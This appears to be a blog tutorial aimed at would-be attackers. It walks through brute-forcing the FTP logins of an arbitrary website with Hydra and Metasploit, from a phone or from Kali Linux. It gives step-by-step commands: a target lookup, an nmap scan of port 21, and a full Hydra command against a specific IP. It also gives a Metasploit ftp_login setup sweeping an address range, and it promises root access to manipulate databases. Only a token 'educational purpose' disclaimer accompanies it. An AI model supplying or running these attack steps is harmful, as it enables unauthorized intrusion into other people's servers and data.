Hi…hackstars, In this post ‘m gonna take you through all the way to attack a ftp server and gain root access to manipulate databases. All these actions can be done both via smartphone or PC. So lets get started.

For Smartphone users :

  • Install Termux via Playstore.Open Termux ,it will install all necessary packages(it take few seconds, time will depend on your connection speed).Now type these commands to download necessary packages.

apt-get update &&  apt-get upgrade

pkg install python

pkg install python2

pkg install git

pkg install dnsutils

pkg install nmap

Now we are ready to go…

Using Hydra :

For Smartphone users they just need to download Hydra which can be done by following command

pkg install hydra

For PC linux users(especially Kali Linux) Hydra is pre-installed.

Now both Smartphone users or linux PC users just type the commands as shown :

  1. First you have to find out the IP address of website onto which you want to attack. For this you can try dnslookup or any online tools like iplookup or reverse dns.

    

2.  Now it’s time to check whether FTP port is up or not. For this use nmap.

 

3. It will give its output, check if ftp port(port 21) is open or up.


Here as you can see Port 21 or ftp port is open,so we can further process the attack.

4. Choose a username and password list for BruteForcing the ftp admin panel. For Kali linux users many password lists are available in
/usr/share/wordlists/

Smartphone users can download username list and password list from any website they want or even they can create a .txt file and write password in it line by line.
Same procedure is for username too.

5. Now the final step is to launch the attack via Hydra

Syntax for Hydra is >

hydra  -d  -L  /username-list path -P  /password-list path ftp : ip_address

As in my case username list file is username.txt & password list file is password.txt and both are stored in downloads folder of my phone.
So, here’s the command in my case

 

hydra -d  -L /storage/emulated/0/username.txt -P /storage/emulated/0/password.txt ftp://50.60.120.13

Here -d  will show you each password attempt  ,you can also ignore it. Its optional.
Also if you want to use only one username you can use -l (small L) in place of -L and then in place of username_file path just write that username that you want. Same in case of password if you want to use only one password just replace -P with -p.

Now you are all done, if any password matches it will show you the result.

 

Using Metasploit :

  • For Smartphone users they just need to download Metasploit-Framework which can be done by following command

pkg install unstable-repo

pkg Install metasploit

  • For PC linux users(especially Kali Linux) Metasploit is pre-installed.

Now we can get started,

1. First launch Metasploit-Framework by typing following command

msfconsole

or

msfvenom

2.  Now write following commands

msf auxiliary(ftp_login) > set RHOSTS 192.168.69.50-254

msf auxiliary(ftp_login) > set THREADS 205

msf auxiliary(ftp_login) > set USERNAME username-list

msf auxiliary(ftp_login) > set PASSWORD password-list

If you want to use username-list or password-list you can simply write the path  at suitable positions.

Now just be patient and let it crack the admin panel.
Once it gets the correct id and password it will show you.

So, this is how you gonna hack ftp server using either Hydra or Metasploit-Framework.

Note – This is only for educational purpose and I’m not responsible for any misuse or harm done.

If you need any help then feel free to ask me in comment.

Thanks for coming if you like it then please share it, you will be appreciated.😄


0 Comments

Leave a Reply

Your email address will not be published. Required fields are marked *